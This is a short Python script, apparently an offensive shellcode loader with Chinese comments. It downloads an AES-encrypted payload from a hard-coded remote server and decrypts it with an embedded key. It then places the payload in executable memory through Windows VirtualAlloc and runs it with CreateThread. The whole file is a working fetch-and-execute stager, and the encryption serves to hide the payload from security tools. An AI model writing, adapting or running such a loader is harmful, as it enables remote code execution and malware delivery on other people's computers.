import ctypes
from Cryptodome.Cipher import AES
from Cryptodome.Util.Padding import pad,unpad
import urllib.request
import hashlib


# AES 解密
def aes_decode(encrypted_data: bytes, key: str ) -> bytes:
    key_bytes = hashlib.md5(key.encode()).digest()
    cipher = AES.new(key_bytes, AES.MODE_ECB)
    decrypted = unpad(cipher.decrypt(encrypted_data), AES.block_size)
    return decrypted


key = "0XsW6Rn7"

url = "http://192.168.21.161:8080/aes_shellcode.txt"  # 替换成真实链接

# 下载加密的 shellcode
print("[*] 下载远程 aes_shellcode...")
response = urllib.request.urlopen(url)
aes_shellcode = response.read()


# 解密
print("[*] 解密 aes_shellcode...")
shellcode = aes_decode(aes_shellcode, key)


# 执行
print("[*] 执行 shellcode...")
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
page = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(page), ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, ctypes.c_uint64(page), 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)